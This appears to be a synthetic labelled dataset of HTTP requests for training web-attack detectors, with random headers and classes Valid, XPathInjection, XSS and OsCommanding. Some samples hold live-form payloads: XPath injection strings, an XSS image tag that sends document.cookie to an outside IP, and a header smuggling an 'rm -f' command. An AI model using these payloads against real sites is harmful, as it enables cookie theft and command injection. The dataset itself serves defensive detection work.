Authorization: Basic ZGtuT2Npajp0TWlPMnQ=
Range: -75,2802-6
Referer: http://shdseieo.fr/xlsrn/t9siEeey/aniobe.mspx
TE: chunked;q=0.1,gzip
Trailer: If-None-Match
User-Agent: vwasnuo/4.9.5
UA-CPU: PowerPC
UA-Disp: 4288,202,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 9422x259
Via: tA4cu/1.3 76.219.127.217, 9.4 23.44.129.57
Transfer-Encoding: gzip
Upgrade: F3awa4/4.3, 9rim7/0.4, reilie/2.8, 3il/4.5, Stse/6.1
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 0.142.120.56
X-Serial-Number: 324157325
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45784
Start - Id: 7566
class: Valid
POST /sRanaodcceixs4eivsex/xfD11i55/fh/mGgUPT7M@gY.1tg/scriptgNU/hnetftecntrnpnlrwxee/etUDJl/aE0kyylaec/au6tDioyphrtctmXZ/mJj6T/dW55B4Tf3r/CyWlSlogperl.gif? HTTP/1.1
Content-Length: 44
Content-Language: 3llt6hIa,1tin
Content-Encoding: compress
Content-Location: /g68dae/tt2etnn/aW7dpofo/eplah.ace
Content-MD5: OGVjYXR0Y0FhdGQ1bGUxcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Oct 06 04:34:59 GMT
Last-Modified: Sat, 06 Feb 10 10:26:53 GMT
Host: www.wehtE78.gov:80
Connection: eHeetu9
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nbseboHl-xhui, tp-2ot1lara
Cache-Control: no-cache
Client-ip: 123.58.187.20
Cookie: tosgpy=aR;gAxwtGeo=94583;nrI7=wa3xwp-;eXKXj=a;vJgroup byowI=lruH
Cookie2: $Version="68"
Date: Tue, 29 May 07 04:16:08 GMT
ETag: "lNwGXgAu@mRnVRxV"
Expect: 100-continue
From: pu3inrn@eUo4a.uk
If-Modified-Since: Sun, 01 May 05 03:06:06 GMT
If-Unmodified-Since: Sat, 05 Apr 08 06:39:59 UTC
If-Match: "6hk_OfJQ.9s-Z2B1"
If-None-Match: "SlWb.4xzDEAABcm"
If-Range: *
Max-Forwards: 932
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic dXFjdFRlOjl0ZEFldHA=
Authorization: NTLM Y2xhbmV3b3lpYmNoaWV1Ukkxc2lhZWhhZHVpbnNlZXJzZGFlZXJkNmhTeXNvbA==
Range: -9533
Referer: http://dgcrq.de/hese/vlef/shriR/tlppe/hs5ro.tiff
TE: deflate;q=0.9
Trailer: Trailer
User-Agent: o4fofsSsE/9.4.8.5.2
UA-CPU: x86
UA-Disp: 5527,9702,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5452x8667
Via: HTTP/1.4 www.Piigks.shtml, 1.1 150.54.200.247, Uihsn/6.6 250.35.196.154
Transfer-Encoding: gzip
Upgrade: yooy4/4.0, qvs/0.1, byvoo/5.5, hto/2.6
Warning: 506 www.tOac.jpg "f0eleiamehatghnngo" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 6700173
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8feetpoy6=484&0wel=tknULOj1Thk&ireooee=78004

End - Id: 7566
Start - Id: 21717
class: Valid
GET /iy7vhz1rBUIs/nedOIlCoI/55itthe/fromoptX7Dix2.8fd/e_ZqRr0itB@5Vux9YvQ0/eriynga1cnhr9pe/aOe7Irm1/8X3nll56@wFuuO0hA@sN/e7JK.gZxstvXia60hh@S/etiUoeysaoodhsfs.js?aq10dktZAoyml=29463&prtdgpeiyf=8&olsto=7sw&oYrux=6169450238 HTTP/1.0
Host: www.ca1E.net
Connection: trenLo
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=79
Client-ip: 207.179.56.125
Cookie: 6sx3nxhinrSpo=465895;isq=catphpprh;Kconnect3T_=oew0atironehsaeh2;u8zicihoennhu=0568536418;j8wp-TL6ATMU4=wAX7-jM;bKadminx_bnog=tAnSSVP_
Cookie2: $Version="651"
Date: Wed, 16 Aug 06 24:47:47 CET
ETag: W/"-9ObLH3P9e_IY2me8Ua"
Expect: 100-continue
From: pd5ue@mslawiH.biz
If-Modified-Since: Tue, 02 May 06 09:47:44 UTC
If-Unmodified-Since: Fri, 05 Nov 04 16:15:07 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Jun 09 17:46:27 CET
Max-Forwards: 887
MIME-Version: 5.7
Pragma: tii='AOafl'
Proxy-Authorization: Basic OWVrZHRvYWU6b3J1cA==
Authorization: Digest response="BDAfDFA6AEF72bCE2BC4eC48ecdeF2Bc"
Range: 2-286,124579-86667
Referer: /ollm/mmO4a/ea42efbs/eWsowtM.gif
TE: chunked,trailers
Trailer: Trailer
User-Agent: butRgfeahr1t57efaunl
UA-CPU: Sparc
UA-Disp: 079,7856,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 664x378
Via: FTP/6.8 www.ryhor.html:27737, pepe/8.3 www.6zvne2ea.tiff, 3.3 153.160.105.37
Transfer-Encoding: gzip
Upgrade: cOZhi/2.4, vroA/8.4, sad/7.8, Ptnyns/5.0
Warning: 456 16.111.210.179 "htasayeJyno" "Fri, 12 Nov 04 12:32:53 CET"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 51402
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21717
Start - Id: 18920
class: Valid
GET /scGANPb/8_o3sEcatAA5VEV/Anl4xecthaahco/o7.bin?tl=bpuTmodtnnull&fzLQQorB=309&v8hnm=910&o6slnbejqTgtxg=92979&DSsystemTy@nullJebgsoundEA=ec&iohsclihsw=584800&@OPcbPz=itadft&UxnW57P_cOi=o5gruswymqhseuBee1 HTTP/1.0
Host: www.7s6txoo.net
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: identity
Accept-Language: fewrei-cbnT;q=0.4, fnutc-ss;q=0.5, isi6lulh-avmtdw, Br-etenin, a-oo
Cache-Control: ktr4cei='ee5'
Client-ip: 166.177.25.206
Cookie: hn7tyht3rinsgz=ineoVhviaccess_log e;inputSdhjpjKeH=293
Cookie2: $Version="674"
Date: Wed, 20 Oct 04 14:55:52 CET
ETag: W/"su.O@LDx_sPJFRT9"
Expect: 100-continue
From: yjsS@orU9r.uk
If-Modified-Since: Mon, 28 Nov 05 07:47:42 CET
If-Unmodified-Since: Mon, 09 Nov 09 01:01:15 CET
If-Match: *
If-None-Match: "nyRL.kacuuQGtFem"
If-Range: "JxwwPhwxlaujvVdKP"
Max-Forwards: 92
MIME-Version: 3.0
Pragma: nnesddN=en
Proxy-Authorization: Digest nonce
Authorization: NTLM bWhlOHNhZmdlbmV0YW90eGVkaW9zajRoYm5Jbnk3YUs1cnQ=
Range: -69
Referer: /rthibto/n4va5d/9iIR/ohowz/2acr.gif
TE: trailers,gzip,trailers
Trailer: User-Agent
User-Agent: GwNls/3.9.7.2
UA-CPU: Sparc
UA-Disp: 745,1444,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 905x897
Via: FTP/8.6 38.10.173.232
Transfer-Encoding: gzip
Upgrade: ensdmo/4.9, 8gvNs/8.5, evntyz/9.1, 7nshfi/4.0
Warning: 226 123.83.144.13:9585 "laaos" 
X-Forwarded-For: 85.156.7.96
X-Serial-Number: 27260320301
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18920
Start - Id: 49716
class: XPathInjection
GET /hhUxl5sjlVxHXQTS_/MittsajaT.mspx?A1lNebpurahata=ukasf%27++or+d9c%2FlB%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D7%5D+++++or+++++%27ax6eC%27++++%3D++%27&ihBB=5&kchtnDee0Txsb=tftqclibl+d%2F+&me0d=232671602&rteAehsfsthtota=evaliN%28q%26onj+%5Bhomea&ipbynfznUodi1g=orRKdsoDyK&sht=360&xefesjs5aaTia=281&WQ4w=tlseeo&btsiopeenav=t3BewyVR HTTP/1.0
Host: www.Na6asae.net
Connection: 9udy
Accept: */*
Accept-Charset: isiri-3342;q=0.8, windows-1250, iso-8859-6
Accept-Encoding: identity;q=0.6, compress;q=0.5, identity, identity
Accept-Language: xon0h-rst2s9;q=0.7, eNiuE-t
Cache-Control: no-cache
Client-ip: 108.36.71.41
Cookie: yut=e_@s.WGsu0t5
Cookie2: $Version="828"
Date: Fri, 14 Nov 08 10:03:28 UTC
ETag: "iITkPXqitf-bCHofqIg"
Expect: 100-continue
From: u5ln@onsTkmM.ch
If-Modified-Since: Sun, 29 Nov 09 03:35:29 CET
If-Unmodified-Since: Thu, 29 Jun 06 22:50:29 UTC
If-Match: *
If-None-Match: "hUUge31XwwYWv51BT7v"
If-Range: Sun, 18 Dec 05 09:49:49 GMT
Max-Forwards: 41
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iest9re"
Authorization: Basic ZWFkbE9XZWE6NHVTeGRlZWU=
Range: 74-4,110349-,51246-
Referer: /0efo/teNr8/rewleh.nsf
TE: gzip;q=0.4,chunked,gzip
Trailer: If-Modified-Since
User-Agent: s3hee/7.8.5.4.1
UA-CPU: StrongARM
UA-Disp: 731,8185,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 6094x1402
Via: 4.5 62.242.219.94, 8.0 www.wxapd.tiff, 2.1 38.154.240.4
Transfer-Encoding: lior4
Upgrade: hdoAgi/1.2, icsn/0.8, don/0.5
Warning: 018 www.iupl6.jpg "b3zD8yiorsn" 
X-Forwarded-For: 235.101.74.70
X-Serial-Number: 9273829516846529
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49716
Start - Id: 46962
class: XSS
POST /oZCh/o4zoOVwinntsYo@divD/9@aobjectCcGGb/o.apmevXILR.dll? HTTP/1.0
Content-Length: 207
Content-Language: rrnI,t,9csf
Content-Encoding: identity
Content-Location: http://hLes.gov/ASeagxi.html
Content-MD5: YTdvdGZobzl0b2xodDJlaw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 Apr 05 08:29:42 GMT
Last-Modified: Mon, 30 Nov 09 19:27:56 CET
Host: www.zntesia6a.st
Connection: keep-alive
Accept: text/*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 248.152.241.195
Cookie: qhNfso=943
Cookie2: $Version="609"
Date: Thu, 23 Jul 09 10:17:10 CET
ETag: "6g5uOF.cJy1pW@7l6"
Expect: 100-continue
From: trhir@9toer.gov
If-Modified-Since: Tue, 19 Jan 10 19:55:27 UTC
If-Unmodified-Since: Sat, 12 Jan 08 03:46:11 GMT
If-Match: *
If-None-Match: "adlZDISFzsbWRSS9j."
If-Range: Mon, 08 Mar 10 13:20:16 UTC
Max-Forwards: 7
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nc=ff89aaf3
Authorization: Basic bWVPZHJyZWc6b2FzaHRvdA==
Range: 7-,-974,384-64
Referer: http://www.4eEnN.gov/tE2tc/etuxo/uIeWne1.php3
TE: trailers
User-Agent: oMTg2lNcW- http://www.herPdst.ch
UA-CPU: 68000
UA-Disp: 698,9133,32
UA-OS: FreeBSD
UA-Color: color16
Via: 6.3 www.ghloclth.shtml:49, 0.3 149.218.254.216:0449, HTTP/1.5 www.chiC.jpeg
Transfer-Encoding: identity
Upgrade: aef/2.4, poaoke/2.0, 3hsnf/0.2
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3s=<img  src=&{[window.open('http://80.72.91.100/lansni.php'+document.cookie);]};  >&iotqao0YlnTess=aservicesohgpdnwchildEr&esaol=layaMtsRtTixtahdo&q98sCbfromPcuqj=13540

End - Id: 46962
Start - Id: 9703
class: Valid
GET /sE578/dtitumuOlnyEtt8er/tsw8etr4ehacscgr/ketIgOKDrQidwaG/eE.n@r0Gw3EBNx3U3hRl/eoWermrtc/lrAutjheaolEiigha/jbp/zvC.N/hetN9Yphlechoeb2h8.htm?Tigp=ea+hso9t+&wEeeKywdngtpdwo=96qzKrYd4&ve=uwnuc1dshn70rran&Rw-0n=wXvHrxML&A7trs=otb&7tedcyewmtpaewY=eGbaOY&eemieroastEtadV=586144&UPFieORperlk=29034196&11tcthatonfr=oK8_UDKnFjLG&eww=IYtosopenntPc&plikedY6rUbUWG=M+&z5omdW=8R_KNgs&7he=udfhqed-h%3Anoder HTTP/1.1
Host: www.btlcbe.org
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr;q=0.0, euc-jp
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 37.224.147.245
Cookie: mv2zscp3=+ &@eD;hthoas=4umnnntfVht2bm;tsDweuntryetod=14
Cookie2: $Version="8"
Date: Mon, 07 Sep 09 21:24:13 GMT
ETag: "6pz__4eCgpy@_zP2KI"
Expect: ewncdw
From: 6shioi@dci7b.st
If-Modified-Since: Mon, 05 Oct 09 16:50:46 GMT
If-Unmodified-Since: Sat, 30 Oct 04 17:49:15 UTC
If-Match: "93paQQ2zOTUpv1wK9Za"
If-None-Match: "Seb_no44mbmmnYwZmqNj"
If-Range: Thu, 10 Mar 05 02:20:53 CET
Max-Forwards: 9527
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic Nk5ZdGV5QU46b2xHczBmcg==
Authorization: Basic dzhlczpkb292c3Q=
Range: 06820-936838,-76378
Referer: http://2aSyssr0.st/hknhn/ia5l9di/nmnw66/qrootm.php
TE: chunked;q=0.3,gzip;q=0.7,chunked;q=0.1
Trailer: Accept
User-Agent: snemgs8e
UA-CPU: x86
UA-Disp: 229,8929,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 141x4409
Via: HTTP/5.4 www.ktvmd7IS.jpeg
Transfer-Encoding: dratn
Upgrade: td7l/3.2, eIl/8.1, toa/8.7
Warning: 234 www.uleantM.png "edlvurlsnnnuAery" "Sun, 11 Mar 07 17:10:17 GMT"
X-Forwarded-For: 186.223.84.207
X-Serial-Number: 66630290652
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9703
Start - Id: 49600
class: XPathInjection
GET /X6E3M.d/tNMKdA.x@L/b68i0sniAf.jpeg?ytbzasmOcnlt=3&H@adNAYidHn=mail6b&o8wrhnractYi=atowN%27+++++or+++6++%3C+++++count%28path%2Fchild%3A%3A*%29+++or++++%27tt8t%27++%3D++++%27&asam5=466208&eeseot=492&onana=1ezotrpsxmliaoe+z&gfiM0e=59 HTTP/1.1
Host: 178.80.99.3
Connection: n1h7e
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 62.59.73.240
Cookie: FKmwk=n7ntar2sdoiwaE;fht1t=rcdeb8iI8hz;a8aqwrtn83dltti=annddrennkr;aioec=pcB;m36lluxgal8aeth=OoVN
Cookie2: $Version="785"
Date: Mon, 22 Sep 08 19:44:14 CET
ETag: "OmYn45rY5Z5qYtyD0"
Expect: 100-continue
From: tdaOt@esEtnmNs.it
If-Modified-Since: Fri, 09 Nov 07 03:06:27 GMT
If-Unmodified-Since: Sun, 13 Jul 08 14:45:52 GMT
If-Match: "eHujKSEypHPDUITto0m@"
If-None-Match: *
If-Range: Wed, 16 Aug 06 22:50:39 GMT
Max-Forwards: 01
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM c255bzF0ZndMd3liYThvZWlvb25QZWEzbnR6bG10cnR0ZA==
Authorization: Basic MGNudHNPZjphamF1
Range: 7852-
Referer: /txhlBm.shtml
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/6.4 (compatible; MSIE 3.8; Solaris; xsicdae; Mrdihtua; TMntx)
UA-CPU: StrongARM
UA-Disp: 1997,806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 122x540
Via: baa1iu/3.2 www.cewhy.gif:6874
Transfer-Encoding: compress
Upgrade: add/2.5
Warning: 760 227.98.126.37 "nIw39hepCclatnett8" "Tue, 06 Nov 07 04:36:32 GMT"
X-Forwarded-For: 94.116.73.204
X-Serial-Number: 9696710
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49600
Start - Id: 2780
class: Valid
GET /_w6arh7Vusrbwj/s60X@U32w.U@tcfvP0/bir3iaiamditnhsa/ebwl/yewoEweu6gec/lMqR_dz/6ltamloodens.dll?tabzf0uee6aazkr=ri1wtv29ueeu&tlO0Kstyle=309&rhosa85tjchd2=OyeeueRetb7rs98ttecm&zCh1d=MnxmNc&iOeon=8&EobxTTw=749032438&7hznyo=dlm&ike0i3imbft=ptselect%24sWnr1 HTTP/1.1
Host: 12.214.91.21:48365
Connection: Usstn
Accept: image/*;q=0.6, text/*;q=0.4, image/*;q=0.3
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.1, deflate
Accept-Language: h-rhuySsit;q=0.2, mob-s4n;q=0.6, put-4x, iFciwa-wve;q=0.8
Cache-Control: rio='ty4'
Client-ip: 19.197.161.153
Cookie: darF7=27;Amteim0nthag=90;Allla=utptrasmoeiunzcy
Cookie2: $Version="78"
Date: Mon, 25 Aug 08 22:37:11 UTC
ETag: W/"12TedjeK8uSs1I9.Mo4"
Expect: 8rlgu=eqs8
From: 7nttm@aa4uGahn.st
If-Modified-Since: Sun, 21 Mar 04 12:39:09 GMT
If-Unmodified-Since: Thu, 17 Apr 08 24:37:56 UTC
If-Match: "4Q.7H_-v30NFu1Z5vm5_"
If-None-Match: *
If-Range: "8@yZeHbuDs8v6vsYnN"
Max-Forwards: 2
MIME-Version: 5.1
Pragma: O=p6tozbNa
Proxy-Authorization: Digest realm
Authorization: Digest opaque="fDe6hi"
Range: 771-26
Referer: http://eMsicee.net/h0lro/ddgae/tiiqea/Lims.swf
TE: gzip;q=0.8,deflate;q=0.1,trailers
Trailer: Warning
User-Agent: xs5iSsIbih
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 944x3965
Via: 4.7 178.128.61.89, FTP/5.9 www.eicejl.gif
Transfer-Encoding: lsul; asebu2l=Dhtl
Upgrade: Sbhjos/1.1
Warning: 433 www.3iZiO.shtml "i0ieOtioafSs" "Thu, 10 Jun 04 22:10:06 CET"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2780
Start - Id: 30142
class: Valid
GET /meQ8aJeodsa.jpg? HTTP/1.1
Host: www.scblagJi.it
Connection: keep-alive
Accept: audio/x-wav, image/*;q=0.1
Accept-Charset: iso-8859-6, iso-2022-kr;q=0.1, ks_c_5601-1987;q=0.2, iso-8859-15;q=0.3, koi8-r
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=07086
Client-ip: 33.172.35.145
Cookie: 9p8echoC=sss9H;rmt_p4=kd29;c8slTemize1icn=yWoeidwov;ja1oTm=fap
Cookie2: $Version="5"
Date: Tue, 08 Sep 09 23:39:41 UTC
ETag: "56R-Fm_uD_@qvTi2CaIg"
Expect: Rvee=steie
From: Hrht@stsembt.uk
If-Modified-Since: Fri, 19 Dec 08 13:19:08 CET
If-Unmodified-Since: Mon, 20 Sep 04 18:49:33 CET
If-Match: "-R.GyLl31b9pIXSZuv"
If-None-Match: *
If-Range: Sun, 21 Mar 04 09:21:21 CET
Max-Forwards: 994
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic dDJyb2VuOm9zYnRh
Authorization: NTLM aW9yR2RsdG5zcWNybzRsdG1uZTRyTkFvcW5tc29zbmt1MmF5ZW9jZA==
Range: -418366,88-
Referer: http://yueonu.ch/enaoalee.htm
TE: gzip;q=0.3,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.9 (X11; U; Open BSD i386 7.3; Li-ot; rv:4.1.8) Gecko/94628419
UA-CPU: Sparc
UA-Disp: 3355,7302,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 2809x7842
Via: HTTP/7.7 www.itlwo.shtml, 7.2 www.esucTs.html
Transfer-Encoding: gzip
Upgrade: rners/6.8, wOlaEq/9.2
Warning: 949 87.230.32.41 "do1d6" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 420548237983036906
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30142
Start - Id: 42935
class: OsCommanding
GET /q4ozeruon/tfjsnb8idzehat/o7mcNtT/odhweeCiwt7ch4Ep/wote6lrsgEif/tOu7I9xpjZ5na4CiZ/thlaeaoxE2oe/3RM8q_m/oMx6y9DJb3Pv.png?aaenllronptwT=cRerdailrotlmES&a8=08920213&yautcUrt5da=s&rrs4eZRsl9nrsam=Erunion&C6vySo=wp-t+n%2Fda HTTP/1.0
Host: www.iMedes.gov:5
Connection: ihsIirs
Accept: video/*;q=0.8
Accept-Charset: macintosh, x-mac-japanese
Accept-Encoding: 
Accept-Language: rm   -f     /tmp/y|
Cache-Control: no-store
Client-ip: 226.241.221.163
Cookie: 2w07=5940;nSnhl=fHGuvr
Cookie2: $Version="148"
Date: Wed, 30 Dec 09 06:31:41 GMT
ETag: W/"i2s5cQ0-PZEOSG4GFo"
Expect: 100-continue
If-Modified-Since: Tue, 28 Oct 08 01:07:02 CET
If-Unmodified-Since: Mon, 28 Jan 08 19:15:33 UTC
If-Match: "ubFwfu3IVSe@CEm7rx"
If-Range: Mon, 17 Oct 05 13:52:05 CET
Max-Forwards: 6
MIME-Version: 6.5
Pragma: no-cache
Authorization: Basic aW5uNzp0VWFzaXFzdA==
Range: 01418-88080,370072-
Referer: http://www.hC6ew.it/ttpiNoro/elsoirrs/hstctsal.msf
TE: trailers
Trailer: Referer
User-Agent: u9GxOo98g http://www.9teKmi7.net
UA-CPU: PowerPC
UA-Disp: 633,7308,8
UA-Color: color32
UA-Pixels: 512x475
Via: 5.0 55.98.52.230, taob/3.4 www.o0o4e.js, 3.0 www.i1bmt.tiff
Transfer-Encoding: gzip
Upgrade: rts/3.1, eacx/4.9, rit/1.5, Wj7c/1.4
Warning: 513 www.cgtoaN.jpg "orin5gbEs" 
----: ------------------------------------------------

null

End - Id: 42935
Start - Id: 13688
class: Valid
GET /t@Tp/pupsnNeg7aa6/gdBxp_47J1/knme33/du7e9e1anyIwlea.mspx?eenheu=jhekoepllectrnTto&jpeTrycip=79737&Tnnsweq=E%3Bybetweene HTTP/1.0
Host: www.kcabmlNik.st
Connection: aezfeV
Accept: video/mpeg;q=0.3, text/*, audio/*;q=0.5
Accept-Charset: windows-1252, x-mac-arabic, x-mac-icelandic;q=0.6, x-mac-turkish
Accept-Encoding: *;q=0.0
Accept-Language: onabq-eot;q=0.3, o-7rit, beh-E8Nop
Cache-Control: no-transform
Client-ip: 230.127.50.78
Cookie: frRathWhna8ba=00;ttscsssa=60;aKuz=0orrDjnprtrtiBHt3;aabtxzei=54457;1DEbfwp-pwC=;wgetGh;lrEcao=96444
Cookie2: $Version="08"
Date: Sun, 18 Nov 07 02:32:23 UTC
ETag: "r9hc6qc.ObpsPh1J"
Expect: 100-continue
From: scomrohe@oeti.fr
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Tue, 27 Apr 10 05:04:26 CET
If-Match: "6gfP-lFeoCkf.JIwVy"
If-None-Match: *
If-Range: Wed, 25 Jun 08 09:07:15 UTC
Max-Forwards: 27
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: s0oiHh O7Mzit=q03lD
Range: -922184,573-
Referer: /de8a/aeij/soiern/aiediO/abdto.cfm
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/8.7 (Windows; U; Windows NT 7.0; yu-le; rv:2.1.0) Gecko/25855948
UA-CPU: Sparc
UA-Disp: 2040,5971,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x935
Via: 3.1 93.246.85.194:2596
Transfer-Encoding: gzip
Upgrade: ztst8/6.0, emn/7.0, die/9.5
Warning: 757 36.29.209.66 "rvr2" 
X-Forwarded-For: 145.31.187.12
X-Serial-Number: 1852790108043394492
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 13688
Start - Id: 28727
class: Valid
GET /nt22h9Idkvc/oLwIb25Pv.CkN/whereKa/hOzrX-j9x_E08V.F/h3_.gql/8saR0ijiwaqdnn/chwe/ahswprhiSE.exe? HTTP/1.1
Host: 125.82.239.231
Connection: etef
Accept: image/png;q=0.6, application/*;q=0.1
Accept-Charset: macintosh;q=0.1, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 167.209.81.8
Cookie: tahom5n=sq8ch=0atW:
Cookie2: $Version="87"
Date: Sat, 14 May 05 05:49:43 CET
ETag: W/"._uVi_rDyxI380G"
Expect: setaTt7l=ihDm6eu
From: cmNaehb@twerq2.gov
If-Modified-Since: Thu, 15 Apr 10 03:53:28 UTC
If-Unmodified-Since: Thu, 26 Aug 04 20:15:59 GMT
If-Match: "oyxFeo2T49xml2p2..j"
If-None-Match: *
If-Range: Sat, 12 Jan 08 21:43:26 CET
Max-Forwards: 404
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic ZXJVczp1MGE2b2VCTw==
Range: -5
Referer: /mmes/uDopiifE/5teilh/rnrIeedk/tDzrvh.jsp
TE: chunked,gzip,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: 3tuqteniorrbone
UA-CPU: PowerPC
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: pie/7.7 www.csrt8.jpeg, 6.7 www.aOwrztr.jpg:2405
Transfer-Encoding: compress
Upgrade: rie/4.2, ase/3.9
Warning: 642 11.210.65.54:24773 "arbhrinytrt" 
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 840252996378195680
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 28727
Start - Id: 17270
class: Valid
GET /clayp/GiLqe5/1MDxdiv/oiz-XFfqJ1QM/xih/i8nnTAntLetPnesY1sfi/soi/mVIK/dWwDb1UzKBh/rclmsueese.asmx?lddto=wCUFh&veioNj=uEahbgsoundCrnr1ut+ncfnno HTTP/1.0
Host: www.n6ioal.it
Connection: keep-alive
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: 4cnig-teCt, uwq-imtua;q=0.6, tiTLue-fnrri1ps;q=0.0, i-goH
Cache-Control: no-store
Client-ip: 68.43.213.56
Cookie: ieoqcaeeyaie=eT.2BDgO;6cmdTlMDV3h2echo=z5ra;m1eles=eilwqc;nee=8tadeler5smtN3e7he;oa0=4530;znt=5190
Cookie2: $Version="15"
Date: Thu, 25 Mar 10 18:54:40 UTC
ETag: "jeijM8izjBO1wza"
Expect: 8r0cEafD
From: esNfaioe@i4sr.fr
If-Modified-Since: Tue, 25 Sep 07 08:22:22 CET
If-Unmodified-Since: Tue, 07 Aug 07 05:00:09 GMT
If-Match: *
If-None-Match: *
If-Range: "5JLKe@.pyA7jIgcpH1"
Max-Forwards: 28
MIME-Version: 3.8
Pragma: ejoaH='unriehuh'
Proxy-Authorization: Basic dnRuamVzdGE6dGF0dGhlZQ==
Authorization: NTLM ZTB1bDl0aURtbUxvNzZlbHI5ZXRvZThoc0dzZDV0cW5kNQ==
Range: 119-6,6867-,-859
Referer: /s8dL4/enneons/cai6e.swf
TE: trailers,gzip;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.2 (compatible; sNxonezryD; SunOS sun4u; eqapttts7; tderc)
UA-CPU: StrongARM
UA-Disp: 9714,1631,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 552x034
Via: 6.8 www.grtd.gif, FTP/1.8 www.wnenCad.gif, FTP/7.2 www.1nnf3r.gif
Transfer-Encoding: deflate
Upgrade: omut/4.3, 2v0hp/4.8
Warning: 190 www.aefddvq.jpeg "twaMeths2eixnld" "Thu, 30 Jul 09 01:31:53 GMT"
X-Forwarded-For: 153.184.197.192
X-Serial-Number: 835471798337
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17270
Start - Id: 27719
class: Valid
GET /enwem9erpDh9mnocI/nJN_vvjP@fgH-b2h@nwI/shaenh8E2pAi/tnir0inSa204valaa/rzY9lYZn/D8K1q.ZzPDPo/rQREd9kIMC5CrmDN.cfm? HTTP/1.1
Host: www.tgon.ch
Connection: jadtsn
Accept: */*
Accept-Charset: x-mac-chinesesimp;q=0.4, x-mac-japanese, euc-tw;q=0.2, hz-gb-2312, x-mac-roman;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: nskl1ef-edgUj, t7eTel-p3ft;q=0.1, rDsz-birri, cgZcge-osgmle0h, rutT-te;q=0.8
Cache-Control: no-store
Client-ip: 168.240.243.189
